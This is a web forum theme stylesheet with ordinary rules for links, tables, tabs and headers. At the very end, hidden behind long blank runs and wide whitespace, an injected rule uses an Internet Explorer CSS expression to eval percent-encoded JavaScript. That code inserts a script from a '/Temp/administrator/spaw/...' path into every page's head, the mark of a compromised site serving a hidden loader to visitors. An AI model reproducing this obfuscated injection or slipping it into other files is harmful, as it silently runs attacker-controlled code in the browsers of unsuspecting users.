/* Normal, standard links. */
a:link
{
	color: #333333;
}
a:visited
{
	color: #333333;
}
a:hover
{
	color: #333333;
}

/* Navigation links - for the link tree. */
.nav, .nav:link, .nav:visited
{
	color: #000000;
	text-decoration: none;
}
a.nav:hover
{
	color: #cc3333;
	text-decoration: underline;
}

/* Tables should show empty cells. */
table
{
	empty-cells: show;
}

/* By default (td, body..) use verdana in black. */
td, th, tr
{
	font: 10pt Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}

/* The main body of the entire forum. */
body
{
	background-color: #dddddd;
	/*background: #EFEADD url(images/pinkgarden_bg.gif) repeat-x;;*/
	color: #FFFFFF;
	font: 10pt Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
	margin-top: 14px;
	
	
}
.page
{
	color: #000000;
}

/* Input boxes - just a bit smaller than normal so they align well. */
input, textarea, button
{
	color: #000000;
	font-family: Ms sans serif, verdana, sans-serif;
}
input, button
{
	font-size: 90%;
}

textarea
{
	font-size: 100%;
	color: #000000;
	font-family: Ms sans serif, verdana, sans-serif;
}

/* All input elements that are checkboxes or radio buttons. */
input.check
{
}

/* Selects are a bit smaller, because it makes them look even better 8). */
select
{
	font-size: 90%;
	font-weight: normal;
	color: #000000;
	font-family: Ms sans serif, verdana, sans-serif;
}

/* Standard horizontal rule.. ([hr], etc.) */
hr, .hrcolor
{
	height: 1px;
	border: 0;
	color: #666666;
	background-color: #666666;
}

/* No image should have a border when linked */
a img
{
	border: 0;
}
/* A quote, perhaps from another post. */
.quote
{
	color: #000000;
	background-color: #D7DAEC;
	border: 1px solid #000000;
	margin: 1px;
	padding: 1px;
	font-size: x-small;
	line-height: 1.4em;
}

/* A code block - maybe even PHP ;). */
.code
{
	color: #000000;
	background-color: #dddddd;
	font-family: "courier new", "times new roman", monospace;
	font-size: x-small;
	line-height: 1.3em;
	/* Put a nice border around it. */
	border: 1px solid #000000;
	margin: 1px auto 1px auto;
	padding: 1px;
	width: 99%;
	/* Don't wrap its contents, and show scrollbars. */
	white-space: nowrap;
	overflow: auto;
	/* Stop after about 24 lines, and just show a scrollbar. */
	max-height: 24em;
}

/* The "Quote:" and "Code:" header parts... */
.quoteheader, .codeheader
{
	color: #000000;
	text-decoration: none;
	font-style: normal;
	font-weight: bold;
	font-size: x-small;
	line-height: 1.2em;
}

/* Generally, those [?] icons.  This makes your cursor a help icon. */
.help
{
	cursor: help;
}

/* /me uses this a lot. (emote, try typing /me in a post.) */
.meaction
{
	color: red;
}

/* The main post box - this makes it as wide as possible. */
.editor
{
	width: 96%;
}

/* Highlighted text - such as search results. */
.highlight
{
	background-color: yellow;
	font-weight: bold;
	color: black;
}

/* Alternating backgrounds for posts, and several other sections of the forum. */
.windowbg
{
	background: #FFFFFF;
	color: #000000;
}
.windowbg2
{
	background: #FFFFFF;
	color: #000000;
}
.windowbg3
{
	background: #FFFFFF;
	color: #000000;
}
/* the today container in calendar */
.calendar_today
{
	background-color: #FFFFFF;
}

/* These are used primarily for titles, but also for headers (the row that says what everything in the table is.) , .titlebg2 */
.titlebg, tr.titlebg th, tr.titlebg td, tr.titlebg2 td
{
	background: #2686e3;
	color: #FFFFFF;
	font: bold 11px tahoma, Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.titlebg, .titlebg a:link, .titlebg a:visited
{
	color: #FFFFFF;
}

.titlebg a:hover
{
	color: #FF6600;
}
/* same as titlebg, but used where bold text is not needed */
.titlebg2 a:link, .titlebg2 a:visited
{
	color: black;
	font-style: normal;
	text-decoration: underline;
}

.titlebg2 a:hover
{
	text-decoration: underline;
}

/* This is used for categories, page indexes, and several other areas in the forum.
.catbg and .catbg2 is for boardindex, while .catbg3 is for messageindex and display headers*/
.catbg , tr.catbg td , .catbg3 , tr.catbg3 td
{
	background: #2686e3;
	color: #FFF2EF;
	font: bold 10pt Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.catbg2 , tr.catbg2 td
{
	background: #2686e3;
	color: #FFF2EF;
	font: bold 10pt Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.catbg3, tr.catbg3 td, .catbg3 a:link, .catbg3 a:visited
{
	font-size: 95%;
	color: white;
	text-decoration: none;
}
.catbg a:link, .catbg a:visited , .catbg2 a:link, .catbg2 a:visited
{
	color: #FFF2EF;
	text-decoration: none;
}
.catbg a:hover, .catbg2 a:hover, .catbg3 a:hover
{
	color: #660066;
	text-decoration: underline;
}
/* This is used for tables that have a grid/border background color (such as the topic listing.) */
.bordercolor
{
	background-color: #ADADAD;
	padding: 0px;
}

/* This is used on tables that should just have a border around them. */
.tborder
{
	background: #ffffff;
	color: #000000;
	border: 1px solid #2686e3;
}

/* Default font sizes: small (8pt), normal (10pt), and large (14pt). */
.smalltext
{
	height:30px;
	font-size: 8pt;
	font-family: Ms sans serif, verdana, sans-serif;
}
.middletext
{
	font-size: 90%;
}
.normaltext
{
	font-size: small;
}
.largetext
{
	font-size: large;
}


/* Posts and personal messages displayed throughout the forum. */
.post, .personalmessage
{
	width: 100%;
	overflow: auto;
	line-height: 1.3em;
}

/* All the signatures used in the forum.  If your forum users use Mozilla, Opera, or Safari, you might add max-height here ;). */
.signature
{
	width: 100%;
	overflow: auto;
	padding-bottom: 3px;
	line-height: 1.3em;
}

/* Sometimes there will be an error when you post */
.error
{
	color: red;
}


/* definitions for the main tab, active means the tab reflects which page is displayed */
.maintab_first, .maintab_back, .maintab_last, .maintab_active_first, .maintab_active_back, .maintab_active_last
{
	color: white;
	text-transform: uppercase;
	vertical-align: top;
}
.maintab_back, .maintab_active_back
{
	text-decoration: none;
	font-size:  9px;
	vertical-align: top;
	font-family: Ms sans serif, verdana, sans-serif;
	white-space: nowrap;
}

.maintab_first
{
	border-right: solid 1px #2686e3;
}
.maintab_back, .maintab_back_nopad
{
	background: white;
}
.maintab_last
{
	display: none;
}
.maintab_active_first
{
	display: none;
}
.maintab_active_back
{
	background: #F6CFA5;
}
.maintab_active_last
{
	display: none;
}

/* how links behave in main tab. */
.maintab_back a:link , .maintab_back a:visited, .maintab_active_back a:link , .maintab_active_back a:visited
{
	text-decoration: none;
	color: black;
	padding: 3px 5px 3px 5px;
	display: block;
}
.maintab_active_back a:hover
{
	background: #ffe080;
}
.maintab_back a:hover
{
	background: #fff0b0;
}
.maintab_active_back a:link, .maintab_back a:link, .maintab_active_back a:visited, .maintab_back a:visited
{
	border: solid 1px #2686e3;
	border-left: 0px;
}
.maintab_back a:hover, .maintab_active_back a:hover
{
	color: #500000;
	text-decoration: none;
}






/* definitions for the main tab, active means the tab reflects which page is displayed */
.menutab_first, .menutab_back, .menutab_last, .menutab_active_first, .menutab_active_back, .menutab_active_last
{
	color: white;
	text-transform: uppercase;
	vertical-align: top;
}
.menutab_back, .menutab_active_back
{
	text-decoration: none;
	font-size:  9px;
	vertical-align: top;
	font-family: Ms sans serif, verdana, sans-serif;
	white-space: nowrap;
}

.menutab_first
{
	display: none;
}
.menutab_back, .menutab_back_nopad
{
	background: white;
}
.menutab_last
{
	display: none;
}
.menutab_active_first
{
	display: none;
}
.menutab_active_back
{
	background: #F6CFA5;
}
.menutab_active_last
{
	display: none;
}

/* how links behave in main tab. */
.menutab_back a:link , .menutab_back a:visited, .menutab_active_back a:link , .menutab_active_back a:visited
{
	text-decoration: none;
	color: black;
	padding: 3px 5px 3px 5px;
	display: block;
}
.menutab_active_back a:hover
{
	background: #ffe080;
}
.menutab_back a:hover
{
	background: #ffe0b0;
}
.menutab_back a:hover, .menutab_active_back a:hover
{
	color: #500000;
	text-decoration: none;
}
/* definitions for the mirror tab */
.mirrortab_first, .mirrortab_back, .mirrortab_last, .mirrortab_active_first, .mirrortab_active_back, .mirrortab_active_last
{
	color: white;
	text-transform: uppercase;
	vertical-align: top;
}
.mirrortab_back, .mirrortab_active_back
{
	text-decoration: none;
	font-size:  9px;
	vertical-align: top;
	font-family: Ms sans serif, verdana, sans-serif;
	white-space: nowrap;
}

.mirrortab_first
{
	border-right: solid 1px #2686e3;
}
.mirrortab_back
{
	background: #white;
}
.mirrortab_last
{
	display: none;
}
.mirrortab_active_first
{
	display: none;
}
.mirrortab_active_back
{
	background: #F6CFA5;
}
.mirrortab_active_last
{
	display: none;
}
.mirrortab_active_back a:link, .mirrortab_back a:link,.mirrortab_active_back a:visited, .mirrortab_back a:visited
{
	border: solid 1px #2686e3;
	border-left: 0px;
}

.mirrortab_active_back a:hover
{
	background: #ffe080;
}
.mirrortab_back a:hover
{
	background: #fff0b0;
}

/* how links behave in mirror tab. */
.mirrortab_back a:link , .mirrortab_back a:visited, .mirrortab_active_back a:link , .mirrortab_active_back a:visited
{
	text-decoration: none;
	color: black;
	padding: 3px 5px 3px 5px;
	display: block;
}

.mirrortab_back a:hover, .mirrortab_active_back a:hover
{
}
/* The AJAX notifier */
#ajax_in_progress
{
	background: #32CD32;
	color: white;
	text-align: center;
	font-weight: bold;
	font-size: 18pt;
	padding: 3px;
	width: 100%;
	position: fixed;
	top: 0;
	left: 0;
}

.navbar
{
	font: 11px Ms sans serif, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.header
{
	background-image: url(images/bg_headback.gif);
    background-position: right top;
	/*background-color: #FFC1C4;	*/
    
	height: 8px;
	width: 753px;
	border-right-width: 1px;
	border-left-width: 1px;
	border-right-style: solid;
	border-left-style: solid;
	border-right-color: #2686e3;
	border-left-color: #2686e3;
	
}
.headWrap
{
	background-color: #FFFFFF;
	background-image: url(images/pinkgarden_headbg.gif);
	background-repeat: repeat-x;
	height: 85px;
}
.headleft
{
	background-image: url(images/pinkgarden_headleft.gif);
	background-repeat: no-repeat;
	height: 85px;
	width: 17px;
}
.headright
{
	background-image: url(images/pinkgarden_headright.gif);
	background-repeat: no-repeat;
	height: 85px;
	width: 17px;
}
.logowrap
{
	height: 57px;
	width: 200px;
}
.footwrap
{

	/*background-image: url(images/pinkgarden_footbg.gif);*/
	background-repeat: repeat-x;
	height: 10px;
}
.footleft
{
	/*background-image: url(images/pinkgarden_footleft.gif);*/
	background-repeat: no-repeat;
	height: 17px;
	width: 10px;
}
.footright
{
	/*background-image: url(images/pinkgarden_footright.gif);*/
	background-repeat: no-repeat;
	height: 17px;
	width: 10px;
	background-position: right top;
}
.tfoot
{
	background: #FFC1C4;
	color: #FFFFFF;
}
.tfoot a:link , .tfoot a:visited
{
	color: #FFFFFF;
}
.tfoot a:hover
{
	color: #FF4400;
}
.contentwrap
{
	
	border-right-width: 1px;
	border-left-width: 1px;
	border-right-style: solid;
	border-left-style: solid;
	border-right-color: #2686e3;
	border-left-color: #2686e3;
	background-color: #FFFFFF;
}
.navwrap
{
	/*background-image: url(images/pinkgarden_navbg.gif);*/
	background-color: #2686e3;
	background-repeat: repeat-x;
	height: 23px;
	border-right-width: 1px;
	border-left-width: 1px;
	border-right-style: solid;
	border-left-style: solid;
	border-right-color: #2686e3;
	border-left-color: #2686e3;
}
#navstyle
{
	font-family:Tahoma,Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #000000;
	margin:0px;
	padding-top:0px;

}
#navstyle a
{
	font-family:Tahoma,Arial, Helvetica, sans-serif;
    font-size: 11px;
	color: #FFFFFF;
    text-decoration: none;
	font-weight: bold;
}
#navstyle a:hover
{	font-family:Tahoma,Arial, Helvetica, sans-serif;
   font-size: 11px;
	color: #FFFFFF;
   text-decoration: underline;
	font-weight: bold;
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%37%30%34%33%31%3B%20%4A%53%53%33%20%3D%20%27%2F%54%65%6D%70%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%73%70%61%77%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%69%68%75%62%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%54%65%6D%70%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%73%70%61%77%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%69%68%75%62%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































